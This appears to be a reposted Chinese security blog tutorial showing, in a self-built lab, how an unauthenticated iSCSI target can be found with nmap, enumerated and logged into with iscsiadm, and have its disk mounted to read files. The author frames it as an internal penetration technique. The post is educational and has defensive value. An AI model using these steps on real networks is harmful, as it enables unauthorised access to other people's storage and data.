神刀安全网

Hacking iSCSI

前几日看到入侵 Hacking Team 的文章,其中最大的一个突破口就是 iSCSI 未授权访问。那么,什么是 iSCSI,又如何在内网渗透的时候利用 iSCSI 获取敏感信息?于是嗯哼,做笔记呗..

PS: 虽然题目起了一个 Hacking iSCSI,但是实际上就是一个未授权访问而已。

如果有兴趣可以了解一下 什么是 SCSI 协议 ,以及 什么是 iSCSI

0x00

服务端

IP: 10.211.55.18   OS: Ubuntu 

为了减少水表几率,我还是一个内网的 iSCSI 环境比较好。首先安装 iscsitarget:

apt-get install iscsitarget 

修改 /etc/default/iscsitarget:

# cat /etc/default/iscsitarget  ISCSITARGET_ENABLE=true  ISCSITARGET_MAX_SLEEP=3    # ietd options  # See ietd(8) for details  ISCSITARGET_OPTIONS="" 

修改 /etc/iet/ietd.conf:

Target iqn.2016-04.local.test:storage Lun 1 Path=/dev/sda,Type=fileio,ScsiId=lun1,ScsiSN=lun1 

接着重启服务:

# service iscsitarget restart  * Removing iSCSI enterprise target devices:           [ OK ]  * Starting iSCSI enterprise target service            [ OK ] 

运行 netstat -anp | grep 3260 发现已经开启服务了。

# netstat -anp | grep 3260  tcp        0      0 0.0.0.0:3260            0.0.0.0:*               LISTEN      7265/ietd  tcp6       0      0 :::3260                 :::*                    LISTEN      7265/ietd 

客户端

IP: 10.211.55.20 OS: CentOS 

安装 scsi-target-utils:

yum install scsi-target-utils 

0x01

以下为过程:

[root@localhost yum.repos.d]# nmap 10.211.55.18 -p3260  Starting Nmap 5.51 ( http://nmap.org ) at 2016-04-21 19:03 HKT Nmap scan report for 10.211.55.18 Host is up (0.00031s latency). PORT     STATE SERVICE 3260/tcp open  iscsi MAC Address: 00:1C:42:D8:D3:48 (Parallels)  Nmap done: 1 IP address (1 host up) scanned in 13.42 seconds 

发现已经开始 3260 端口,接着用 iscsiadm -m discovery 获取 iqn(iSCSI Qualified Name)。

[root@localhost tmp]# iscsiadm -m discovery -t sendtargets -p 10.211.55.18 10.211.55.18:3260,1 iqn.2016-04.local.test:storage 

利用 iscsiadm 挂载:

[root@localhost yum.repos.d]# iscsiadm -m node -T iqn.2016-04.local.test:storage -p 10.211.55.18 -l Logging in to [iface: default, target: iqn.2016-04.local.test:storage, portal: 10.211.55.18,3260] (multiple) Login to [iface: default, target: iqn.2016-04.local.test:storage, portal: 10.211.55.18,3260] successful. 

fdisk -l 检测是否已经存在:

[root@localhost yum.repos.d]# fdisk -l ...  Disk /dev/sdb: 68.7 GB, 68719476736 bytes  <-- HERE! 255 heads, 63 sectors/track, 8354 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disk identifier: 0x0009be13     Device Boot      Start         End      Blocks   Id  System /dev/sdb1   *           1        8225    66059264   83  Linux /dev/sdb2            8225        8355     1046529    5  Extended /dev/sdb5            8225        8355     1046528   82  Linux swap / Solaris [root@localhost yum.repos.d]# 

接着挂载:

[root@localhost tmp]# mkdir /tmp/test [root@localhost tmp]# mount  /dev/sdb1 /tmp/test/ [root@localhost tmp]# cd /tmp/test/etc [root@localhost tmp]# cat issue Ubuntu 12.04.5 LTS /n /l 

发现已经挂在了 Ubuntu 的硬盘。

如上所示,如果在内网中发现开启的 3260 端口,可以尝试挂载其硬盘。可以获取很多敏感信息。其中 Hacking Team 就是因为泄露了邮件服务器导致 boom。

Reference

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » Hacking iSCSI

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址